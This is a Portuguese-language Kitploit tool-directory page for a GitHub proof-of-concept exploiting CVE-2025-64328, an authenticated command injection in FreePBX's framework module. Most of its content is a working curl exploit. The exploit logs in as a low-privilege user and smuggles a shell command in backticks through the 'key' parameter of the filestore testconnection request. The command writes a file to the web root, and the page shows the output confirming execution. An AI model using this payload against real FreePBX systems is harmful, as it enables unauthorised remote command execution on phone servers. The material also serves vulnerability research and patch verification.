Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-64328_FreePBX-framework-Command-Injection — CVE-2025-64328 FreePBX Injeção de Comandos Autenticada no módulo framework. | Kitploit
Ferramentas/GitHubGitHub/mcorybillington/cve-2025-64328_freepbx-framework-command-injection
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubmcorybillington/cve-2025-64328_freepbx-framework-command-injection

CVE-2025-64328_FreePBX-framework-Command-Injection

CVE-2025-64328 FreePBX Injeção de Comandos Autenticada no módulo framework.

Ver Repositório
11há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-64328 Injeção de Comando Autenticada no FreePBX no módulo framework

Repositório simples de prova de conceito para a Injeção de Comando Autenticada no FreePBX (CVE-2025-64328) no módulo framework.

Análise completa aqui: https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/

Prova de conceito com curl

root@kitploit:~
$ curl -s \
-XPOST --cookie-jar /tmp/freepbx-cookie --data 'username=lowprivuser&password=<lowprivuserpassword>' http://192.168.122.206/admin/config.php -o /dev/null \
--next \
--cookie /tmp/freepbx-cookie -H 'Referer: http://192.168.122.206' 'http://192.168.122.206/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user=asdf&port=22&key=asdf`echo%20rcetest2>/var/www/html/rcetest.txt`&path=test' | jq
{
  "status": true,
  "message": "Login failed"
}

$ curl -sk http://192.168.122.206/rcetest.txt
rcetest2

Template do Nuclei:

CVE-2025-64328.yaml

Baixar ferramenta